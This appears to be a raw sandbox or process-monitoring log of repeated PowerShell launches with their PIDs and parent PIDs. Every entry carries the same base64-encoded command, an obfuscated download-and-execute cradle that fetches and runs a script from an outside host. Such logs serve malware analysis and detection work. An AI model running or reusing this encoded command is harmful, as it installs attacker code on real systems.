"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" powershell -EncodedCommand JABwAGEAdABoACAAPQAgACcALwBmAGEAeAAuAHAAaABwAD8AaQBkAD0AYQBkAG0AaQBuACcAOwAgACQAaABvAHMAdABuAGEAbQBlACAAPQAgACcAegBhAHIAYQB0AG8AbwBuAHMALgBpAG4AZgBvACcAOwAgAEkAJwAnAEUAJwAnAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBjAGwAaQBlAG4AdAApAC4AZABvAHcAbgBsAG8AYQBkAHMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AJwAgACsAIAAkAGgAbwBzAHQAbgBhAG0AZQAgACsAIAAkAHAAYQB0AGgAKQA7AA==
C:\Windows\system32\
c:\windows\system32\windowspowershell\v1.0\powershell.exe
Created
Created
Opened
Opened
Opened
Process
171
6340
powershell.exe
2880
powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" powershell -EncodedCommand JABwAGEAdABoACAAPQAgACcALwBmAGEAeAAuAHAAaABwAD8AaQBkAD0AYQBkAG0AaQBuACcAOwAgACQAaABvAHMAdABuAGEAbQBlACAAPQAgACcAegBhAHIAYQB0AG8AbwBuAHMALgBpAG4AZgBvACcAOwAgAEkAJwAnAEUAJwAnAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBjAGwAaQBlAG4AdAApAC4AZABvAHcAbgBsAG8AYQBkAHMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AJwAgACsAIAAkAGgAbwBzAHQAbgBhAG0AZQAgACsAIAAkAHAAYQB0AGgAKQA7AA==
C:\Windows\system32\
c:\windows\system32\windowspowershell\v1.0\powershell.exe
Created
Process
172
6376
powershell.exe
2880
powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" powershell -EncodedCommand JABwAGEAdABoACAAPQAgACcALwBmAGEAeAAuAHAAaABwAD8AaQBkAD0AYQBkAG0AaQBuACcAOwAgACQAaABvAHMAdABuAGEAbQBlACAAPQAgACcAegBhAHIAYQB0AG8AbwBuAHMALgBpAG4AZgBvACcAOwAgAEkAJwAnAEUAJwAnAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBjAGwAaQBlAG4AdAApAC4AZABvAHcAbgBsAG8AYQBkAHMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AJwAgACsAIAAkAGgAbwBzAHQAbgBhAG0AZQAgACsAIAAkAHAAYQB0AGgAKQA7AA==
C:\Windows\system32\
c:\windows\system32\windowspowershell\v1.0\powershell.exe
Created
Process
173
6456
powershell.exe
3324
powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand JABwAGEAdABoACAAPQAgACcALwBmAGEAeAAuAHAAaABwAD8AaQBkAD0AYQBkAG0AaQBuACcAOwAgACQAaABvAHMAdABuAGEAbQBlACAAPQAgACcAegBhAHIAYQB0AG8AbwBuAHMALgBpAG4AZgBvACcAOwAgAEkAJwAnAEUAJwAnAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBjAGwAaQBlAG4AdAApAC4AZABvAHcAbgBsAG8AYQBkAHMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AJwAgACsAIAAkAGgAbwBzAHQAbgBhAG0AZQAgACsAIAAkAHAAYQB0AGgAKQA7AA==
C:\Windows\system32\
c:\windows\system32\windowspowershell\v1.0\powershell.exe
Created
Process
174
6464
powershell.exe
2880
powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" powershell -EncodedCommand JABwAGEAdABoACAAPQAgACcALwBmAGEAeAAuAHAAaABwAD8AaQBkAD0AYQBkAG0AaQBuACcAOwAgACQAaABvAHMAdABuAGEAbQBlACAAPQAgACcAegBhAHIAYQB0AG8AbwBuAHMALgBpAG4AZgBvACcAOwAgAEkAJwAnAEUAJwAnAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBjAGwAaQBlAG4AdAApAC4AZABvAHcAbgBsAG8AYQBkAHMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AJwAgACsAIAAkAGgAbwBzAHQAbgBhAG0AZQAgACsAIAAkAHAAYQB0AGgAKQA7AA==
C:\Windows\system32\
c:\windows\system32\windowspowershell\v1.0\powershell.exe
Created
Process
175
6508
powershell.exe
2736
powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand JABwAGEAdABoACAAPQAgACcALwBmAGEAeAAuAHAAaABwAD8AaQBkAD0AYQBkAG0AaQBuACcAOwAgACQAaABvAHMAdABuAGEAbQBlACAAPQAgACcAegBhAHIAYQB0AG8AbwBuAHMALgBpAG4AZgBvACcAOwAgAEkAJwAnAEUAJwAnAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBjAGwAaQBlAG4AdAApAC4AZABvAHcAbgBsAG8AYQBkAHMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AJwAgACsAIAAkAGgAbwBzAHQAbgBhAG0AZQAgACsAIAAkAHAAYQB0AGgAKQA7AA==
C:\Windows\system32\
c:\windows\system32\windowspowershell\v1.0\powershell.exe
Created
Created
Opened
Opened
Opened
Process
176
6564
powershell.exe
2880
powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" powershell -EncodedCommand JABwAGEAdABoACAAPQAgACcALwBmAGEAeAAuAHAAaABwAD8AaQBkAD0AYQBkAG0AaQBuACcAOwAgACQAaABvAHMAdABuAGEAbQBlACAAPQAgACcAegBhAHIAYQB0AG8AbwBuAHMALgBpAG4AZgBvACcAOwAgAEkAJwAnAEUAJwAnAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBjAGwAaQBlAG4AdAApAC4AZABvAHcAbgBsAG8AYQBkAHMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AJwAgACsAIAAkAGgAbwBzAHQAbgBhAG0AZQAgACsAIAAkAHAAYQB0AGgAKQA7AA==
C:\Windows\system32\
c:\windows\system32\windowspowershell\v1.0\powershell.exe
Created
Process
177
6696
powershell.exe
2880
powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" powershell -EncodedCommand JABwAGEAdABoACAAPQAgACcALwBmAGEAeAAuAHAAaABwAD8AaQBkAD0AYQBkAG0AaQBuACcAOwAgACQAaABvAHMAdABuAGEAbQBlACAAPQAgACcAegBhAHIAYQB0AG8AbwBuAHMALgBpAG4AZgBvACcAOwAgAEkAJwAnAEUAJwAnAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBjAGwAaQBlAG4AdAApAC4AZABvAHcAbgBsAG8AYQBkAHMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AJwAgACsAIAAkAGgAbwBzAHQAbgBhAG0AZQAgACsAIAAkAHAAYQB0AGgAKQA7AA==
C:\Windows\system32\
c:\windows\system32\windowspowershell\v1.0\powershell.exe
Created
Process
178
6772
powershell.exe
2880
powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" powershell -EncodedCommand JABwAGEAdABoACAAPQAgACcALwBmAGEAeAAuAHAAaABwAD8AaQBkAD0AYQBkAG0AaQBuACcAOwAgACQAaABvAHMAdABuAGEAbQBlACAAPQAgACcAegBhAHIAYQB0AG8AbwBuAHMALgBpAG4AZgBvACcAOwAgAEkAJwAnAEUAJwAnAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBjAGwAaQBlAG4AdAApAC4AZABvAHcAbgBsAG8AYQBkAHMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AJwAgACsAIAAkAGgAbwBzAHQAbgBhAG0AZQAgACsAIAAkAHAAYQB0AGgAKQA7AA==
C:\Windows\system32\
c:\windows\system32\windowspowershell\v1.0\powershell.exe
Created
Created
Opened
Opened
Opened
Process
179
6856
powershell.exe
2880
powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" powershell -EncodedCommand JABwAGEAdABoACAAPQAgACcALwBmAGEAeAAuAHAAaABwAD8AaQBkAD0AYQBkAG0AaQBuACcAOwAgACQAaABvAHMAdABuAGEAbQBlACAAPQAgACcAegBhAHIAYQB0AG8AbwBuAHMALgBpAG4AZgBvACcAOwAgAEkAJwAnAEUAJwAnAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBjAGwAaQBlAG4AdAApAC4AZABvAHcAbgBsAG8AYQBkAHMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AJwAgACsAIAAkAGgAbwBzAHQAbgBhAG0AZQAgACsAIAAkAHAAYQB0AGgAKQA7AA==
C:\Windows\system32\
c:\windows\system32\windowspowershell\v1.0\powershell.exe
Created
Opened
Opened
Opened
Process
180
6912
powershell.exe
2880
powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" powershell -EncodedCommand JABwAGEAdABoACAAPQAgACcALwBmAGEAeAAuAHAAaABwAD8AaQBkAD0AYQBkAG0AaQBuACcAOwAgACQAaABvAHMAdABuAGEAbQBlACAAPQAgACcAegBhAHIAYQB0AG8AbwBuAHMALgBpAG4AZgBvACcAOwAgAEkAJwAnAEUAJwAnAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBjAGwAaQBlAG4AdAApAC4AZABvAHcAbgBsAG8AYQBkAHMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AJwAgACsAIAAkAGgAbwBzAHQAbgBhAG0AZQAgACsAIAAkAHAAYQB0AGgAKQA7AA==
C:\Windows\system32\
c:\windows\system32\windowspowershell\v1.0\powershell.exe
Created
Process
181
6960
powershell.exe
2880
powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" powershell -EncodedCommand JABwAGEAdABoACAAPQAgACcALwBmAGEAeAAuAHAAaABwAD8AaQBkAD0AYQBkAG0AaQBuACcAOwAgACQAaABvAHMAdABuAGEAbQBlACAAPQAgACcAegBhAHIAYQB0AG8AbwBuAHMALgBpAG4AZgBvACcAOwAgAEkAJwAnAEUAJwAnAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBjAGwAaQBlAG4AdAApAC4AZABvAHcAbgBsAG8AYQBkAHMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AJwAgACsAIAAkAGgAbwBzAHQAbgBhAG0AZQAgACsAIAAkAHAAYQB0AGgAKQA7AA==
C:\Windows\system32\
c:\windows\system32\windowspowershell\v1.0\powershell.exe
Created
Created
Opened
Opened
Opened
Process
182
7008
powershell.exe
2880
powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" powershell -EncodedCommand JABwAGEAdABoACAAPQAgACcALwBmAGEAeAAuAHAAaABwAD8AaQBkAD0AYQBkAG0AaQBuACcAOwAgACQAaABvAHMAdABuAGEAbQBlACAAPQAgACcAegBhAHIAYQB0AG8AbwBuAHMALgBpAG4AZgBvACcAOwAgAEkAJwAnAEUAJwAnAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBjAGwAaQBlAG4AdAApAC4AZABvAHcAbgBsAG8AYQBkAHMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AJwAgACsAIAAkAGgAbwBzAHQAbgBhAG0AZQAgACsAIAAkAHAAYQB0AGgAKQA7AA==
C:\Windows\system32\
c:\windows\system32\windowspowershell\v1.0\powershell.exe
Created
Created
Opened
Opened
Opened
Process
183
7052
powershell.exe
2880
powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" powershell -EncodedCommand JABwAGEAdABoACAAPQAgACcALwBmAGEAeAAuAHAAaABwAD8AaQBkAD0AYQBkAG0AaQBuACcAOwAgACQAaABvAHMAdABuAGEAbQBlACAAPQAgACcAegBhAHIAYQB0AG8AbwBuAHMALgBpAG4AZgBvACcAOwAgAEkAJwAnAEUAJwAnAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBjAGwAaQBlAG4AdAApAC4AZABvAHcAbgBsAG8AYQBkAHMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AJwAgACsAIAAkAGgAbwBzAHQAbgBhAG0AZQAgACsAIAAkAHAAYQB0AGgAKQA7AA==
C:\Windows\system32\
c:\windows\system32\windowspowershell\v1.0\powershell.exe
Created
Created
Opened
Opened
Opened
Opened
Opened
Process
184
7084
powershell.exe
2880
powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" powershell -EncodedCommand JABwAGEAdABoACAAPQAgACcALwBmAGEAeAAuAHAAaABwAD8AaQBkAD0AYQBkAG0AaQBuACcAOwAgACQAaABvAHMAdABuAGEAbQBlACAAPQAgACcAegBhAHIAYQB0AG8AbwBuAHMALgBpAG4AZgBvACcAOwAgAEkAJwAnAEUAJwAnAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBjAGwAaQBlAG4AdAApAC4AZABvAHcAbgBsAG8AYQBkAHMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AJwAgACsAIAAkAGgAbwBzAHQAbgBhAG0AZQAgACsAIAAkAHAAYQB0AGgAKQA7AA==
C:\Windows\system32\
c:\windows\system32\windowspowershell\v1.0\powershell.exe
Created
Process
185
7116
powershell.exe
2880
powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" powershell -EncodedCommand JABwAGEAdABoACAAPQAgACcALwBmAGEAeAAuAHAAaABwAD8AaQBkAD0AYQBkAG0AaQBuACcAOwAgACQAaABvAHMAdABuAGEAbQBlACAAPQAgACcAegBhAHIAYQB0AG8AbwBuAHMALgBpAG4AZgBvACcAOwAgAEkAJwAnAEUAJwAnAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBjAGwAaQBlAG4AdAApAC4AZABvAHcAbgBsAG8AYQBkAHMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AJwAgACsAIAAkAGgAbwBzAHQAbgBhAG0AZQAgACsAIAAkAHAAYQB0AGgAKQA7AA==
C:\Windows\system32\
c:\windows\system32\windowspowershell\v1.0\powershell.exe
Created
Process
186
7124
powershell.exe
1356
powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand JABwAGEAdABoACAAPQAgACcALwBmAGEAeAAuAHAAaABwAD8AaQBkAD0AYQBkAG0AaQBuACcAOwAgACQAaABvAHMAdABuAGEAbQBlACAAPQAgACcAegBhAHIAYQB0AG8AbwBuAHMALgBpAG4AZgBvACcAOwAgAEkAJwAnAEUAJwAnAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBjAGwAaQBlAG4AdAApAC4AZABvAHcAbgBsAG8AYQBkAHMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AJwAgACsAIAAkAGgAbwBzAHQAbgBhAG0AZQAgACsAIAAkAHAAYQB0AGgAKQA7AA==
C:\Windows\system32\
c:\windows\system32\windowspowershell\v1.0\powershell.exe
Created
Process
187
7160
powershell.exe
2880
powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" powershell -EncodedCommand JABwAGEAdABoACAAPQAgACcALwBmAGEAeAAuAHAAaABwAD8AaQBkAD0AYQBkAG0AaQBuACcAOwAgACQAaABvAHMAdABuAGEAbQBlACAAPQAgACcAegBhAHIAYQB0AG8AbwBuAHMALgBpAG4AZgBvACcAOwAgAEkAJwAnAEUAJwAnAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBjAGwAaQBlAG4AdAApAC4AZABvAHcAbgBsAG8AYQBkAHMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AJwAgACsAIAAkAGgAbwBzAHQAbgBhAG0AZQAgACsAIAAkAHAAYQB0AGgAKQA7AA==
C:\Windows\system32\
c:\windows\system32\windowspowershell\v1.0\powershell.exe
Created
Process
188
5148
powershell.exe
2880
powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" powershell -EncodedCommand JABwAGEAdABoACAAPQAgACcALwBmAGEAeAAuAHAAaABwAD8AaQBkAD0AYQBkAG0AaQBuACcAOwAgACQAaABvAHMAdABuAGEAbQBlACAAPQAgACcAegBhAHIAYQB0AG8AbwBuAHMALgBpAG4AZgBvACcAOwAgAEkAJwAnAEUAJwAnAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBjAGwAaQBlAG4AdAApAC4AZABvAHcAbgBsAG8AYQBkAHMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AJwAgACsAIAAkAGgAbwBzAHQAbgBhAG0AZQAgACsAIAAkAHAAYQB0AGgAKQA7AA==
C:\Windows\system32\
c:\windows\system32\windowspowershell\v1.0\powershell.exe
Created
Process
189
5616
powershell.exe
2880
powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" powershell -EncodedCommand JABwAGEAdABoACAAPQAgACcALwBmAGEAeAAuAHAAaABwAD8AaQBkAD0AYQBkAG0AaQBuACcAOwAgACQAaABvAHMAdABuAGEAbQBlACAAPQAgACcAegBhAHIAYQB0AG8AbwBuAHMALgBpAG4AZgBvACcAOwAgAEkAJwAnAEUAJwAnAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBjAGwAaQBlAG4AdAApAC4AZABvAHcAbgBsAG8AYQBkAHMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AJwAgACsAIAAkAGgAbwBzAHQAbgBhAG0AZQAgACsAIAAkAHAAYQB0AGgAKQA7AA==
C:\Windows\system32\
c:\windows\system32\windowspowershell\v1.0\powershell.exe
Created
Process
190
5892
powershell.exe
2880
powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" powershell -EncodedCommand JABwAGEAdABoACAAPQAgACcALwBmAGEAeAAuAHAAaABwAD8AaQBkAD0AYQBkAG0AaQBuACcAOwAgACQAaABvAHMAdABuAGEAbQBlACAAPQAgACcAegBhAHIAYQB0AG8AbwBuAHMALgBpAG4AZgBvACcAOwAgAEkAJwAnAEUAJwAnAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBjAGwAaQBlAG4AdAApAC4AZABvAHcAbgBsAG8AYQBkAHMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AJwAgACsAIAAkAGgAbwBzAHQAbgBhAG0AZQAgACsAIAAkAHAAYQB0AGgAKQA7AA==
C:\Windows\system32\
c:\windows\system32\windowspowershell\v1.0\powershell.exe
Created
Process
191
1208
powershell.exe
2880
powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" powershell -EncodedCommand JABwAGEAdABoACAAPQAgACcALwBmAGEAeAAuAHAAaABwAD8AaQBkAD0AYQBkAG0AaQBuACcAOwAgACQAaABvAHMAdABuAGEAbQBlACAAPQAgACcAegBhAHIAYQB0AG8AbwBuAHMALgBpAG4AZgBvACcAOwAgAEkAJwAnAEUAJwAnAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBjAGwAaQBlAG4AdAApAC4AZABvAHcAbgBsAG8AYQBkAHMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AJwAgACsAIAAkAGgAbwBzAHQAbgBhAG0AZQAgACsAIAAkAHAAYQB0AGgAKQA7AA==
C:\Windows\system32\
c:\windows\system32\windowspowershell\v1.0\powershell.exe
Created
Created
Opened
Opened
Opened
Process
192
5204
powershell.exe
3608
powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand JABwAGEAdABoACAAPQAgACcALwBmAGEAeAAuAHAAaABwAD8AaQBkAD0AYQBkAG0AaQBuACcAOwAgACQAaABvAHMAdABuAGEAbQBlACAAPQAgACcAegBhAHIAYQB0AG8AbwBuAHMALgBpAG4AZgBvACcAOwAgAEkAJwAnAEUAJwAnAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBjAGwAaQBlAG4AdAApAC4AZABvAHcAbgBsAG8AYQBkAHMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AJwAgACsAIAAkAGgAbwBzAHQAbgBhAG0AZQAgACsAIAAkAHAAYQB0AGgAKQA7AA==
C:\Windows\system32\
c:\windows\system32\windowspowershell\v1.0\powershell.exe
Created
Process
193
6708
powershell.exe
2880
powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" powershell -EncodedCommand JABwAGEAdABoACAAPQAgACcALwBmAGEAeAAuAHAAaABwAD8AaQBkAD0AYQBkAG0AaQBuACcAOwAgACQAaABvAHMAdABuAGEAbQBlACAAPQAgACcAegBhAHIAYQB0AG8AbwBuAHMALgBpAG4AZgBvACcAOwAgAEkAJwAnAEUAJwAnAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBjAGwAaQBlAG4AdAApAC4AZABvAHcAbgBsAG8AYQBkAHMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AJwAgACsAIAAkAGgAbwBzAHQAbgBhAG0AZQAgACsAIAAkAHAAYQB0AGgAKQA7AA==
C:\Windows\system32\
c:\windows\system32\windowspowershell\v1.0\powershell.exe
Created
Process
194
4124
powershell.exe
2492
powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand JABwAGEAdABoACAAPQAgACcALwBmAGEAeAAuAHAAaABwAD8AaQBkAD0AYQBkAG0AaQBuACcAOwAgACQAaABvAHMAdABuAGEAbQBlACAAPQAgACcAegBhAHIAYQB0AG8AbwBuAHMALgBpAG4AZgBvACcAOwAgAEkAJwAnAEUAJwAnAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBjAGwAaQBlAG4AdAApAC4AZABvAHcAbgBsAG8AYQBkAHMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AJwAgACsAIAAkAGgAbwBzAHQAbgBhAG0AZQAgACsAIAAkAHAAYQB0AGgAKQA7AA==
C:\Windows\system32\
c:\windows\system32\windowspowershell\v1.0\powershell.exe
Created
Process
195
6632
powershell.exe
2880
powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" powershell -EncodedCommand JABwAGEAdABoACAAPQAgACcALwBmAGEAeAAuAHAAaABwAD8AaQBkAD0AYQBkAG0AaQBuACcAOwAgACQAaABvAHMAdABuAGEAbQBlACAAPQAgACcAegBhAHIAYQB0AG8AbwBuAHMALgBpAG4AZgBvACcAOwAgAEkAJwAnAEUAJwAnAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBjAGwAaQBlAG4AdAApAC4AZABvAHcAbgBsAG8AYQBkAHMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AJwAgACsAIAAkAGgAbwBzAHQAbgBhAG0AZQAgACsAIAAkAHAAYQB0AGgAKQA7AA==
C:\Windows\system32\
c:\windows\system32\windowspowershell\v1.0\powershell.exe
Created
Process
196
5760
powershell.exe
2880
powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" powershell -EncodedCommand JABwAGEAdABoACAAPQAgACcALwBmAGEAeAAuAHAAaABwAD8AaQBkAD0AYQBkAG0AaQBuACcAOwAgACQAaABvAHMAdABuAGEAbQBlACAAPQAgACcAegBhAHIAYQB0AG8AbwBuAHMALgBpAG4AZgBvACcAOwAgAEkAJwAnAEUAJwAnAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBjAGwAaQBlAG4AdAApAC4AZABvAHcAbgBsAG8AYQBkAHMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AJwAgACsAIAAkAGgAbwBzAHQAbgBhAG0AZQAgACsAIAAkAHAAYQB0AGgAKQA7AA==
C:\Windows\system32\
c:\windows\system32\windowspowershell\v1.0\powershell.exe
Created
Process
197
7020
powershell.exe
2880
powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" powershell -EncodedCommand JABwAGEAdABoACAAPQAgACcALwBmAGEAeAAuAHAAaABwAD8AaQBkAD0AYQBkAG0AaQBuACcAOwAgACQAaABvAHMAdABuAGEAbQBlACAAPQAgACcAegBhAHIAYQB0AG8AbwBuAHMALgBpAG4AZgBvACcAOwAgAEkAJwAnAEUAJwAnAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBjAGwAaQBlAG4AdAApAC4AZABvAHcAbgBsAG8AYQBkAHMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AJwAgACsAIAAkAGgAbwBzAHQAbgBhAG0AZQAgACsAIAAkAHAAYQB0AGgAKQA7AA==
C:\Windows\system32\
c:\windows\system32\windowspowershell\v1.0\powershell.exe
Created
Process
198
4248
powershell.exe
2880
powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" powershell -EncodedCommand JABwAGEAdABoACAAPQAgACcALwBmAGEAeAAuAHAAaABwAD8AaQBkAD0AYQBkAG0AaQBuACcAOwAgACQAaABvAHMAdABuAGEAbQBlACAAPQAgACcAegBhAHIAYQB0AG8AbwBuAHMALgBpAG4AZgBvACcAOwAgAEkAJwAnAEUAJwAnAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBjAGwAaQBlAG4AdAApAC4AZABvAHcAbgBsAG8AYQBkAHMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AJwAgACsAIAAkAGgAbwBzAHQAbgBhAG0AZQAgACsAIAAkAHAAYQB0AGgAKQA7AA==
C:\Windows\system32\
c:\windows\system32\windowspowershell\v1.0\powershell.exe
Created
Process
199
6024
powershell.exe
516
powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand JABwAGEAdABoACAAPQAgACcALwBmAGEAeAAuAHAAaABwAD8AaQBkAD0AYQBkAG0AaQBuACcAOwAgACQAaABvAHMAdABuAGEAbQBlACAAPQAgACcAegBhAHIAYQB0AG8AbwBuAHMALgBpAG4AZgBvACcAOwAgAEkAJwAnAEUAJwAnAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBjAGwAaQBlAG4AdAApAC4AZABvAHcAbgBsAG8AYQBkAHMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AJwAgACsAIAAkAGgAbwBzAHQAbgBhAG0AZQAgACsAIAAkAHAAYQB0AGgAKQA7AA==
C:\Windows\system32\
c:\windows\system32\windowspowershell\v1.0\powershell.exe
Created
Process
200
1212
powershell.exe
2880
powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" powershell -EncodedCommand JABwAGEAdABoACAAPQAgACcALwBmAGEAeAAuAHAAaABwAD8AaQBkAD0AYQBkAG0AaQBuACcAOwAgACQAaABvAHMAdABuAGEAbQBlACAAPQAgACcAegBhAHIAYQB0AG8AbwBuAHMALgBpAG4AZgBvACcAOwAgAEkAJwAnAEUAJwAnAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBjAGwAaQBlAG4AdAApAC4AZABvAHcAbgBsAG8AYQBkAHMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AJwAgACsAIAAkAGgAbwBzAHQAbgBhAG0AZQAgACsAIAAkAHAAYQB0AGgAKQA7AA==
C:\Windows\system32\
c:\windows\system32\windowspowershell\v1.0\powershell.exe
Created
Process
201
6280
powershell.exe
3284
powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand JABwAGEAdABoACAAPQAgACcALwBmAGEAeAAuAHAAaABwAD8AaQBkAD0AYQBkAG0AaQBuACcAOwAgACQAaABvAHMAdABuAGEAbQBlACAAPQAgACcAegBhAHIAYQB0AG8AbwBuAHMALgBpAG4AZgBvACcAOwAgAEkAJwAnAEUAJwAnAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBjAGwAaQBlAG4AdAApAC4AZABvAHcAbgBsAG8AYQBkAHMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AJwAgACsAIAAkAGgAbwBzAHQAbgBhAG0AZQAgACsAIAAkAHAAYQB0AGgAKQA7AA==
C:\Windows\system32\
c:\windows\system32\windowspowershell\v1.0\powershell.exe
Created
Process
202
6276
powershell.exe
2880
powershell.exe
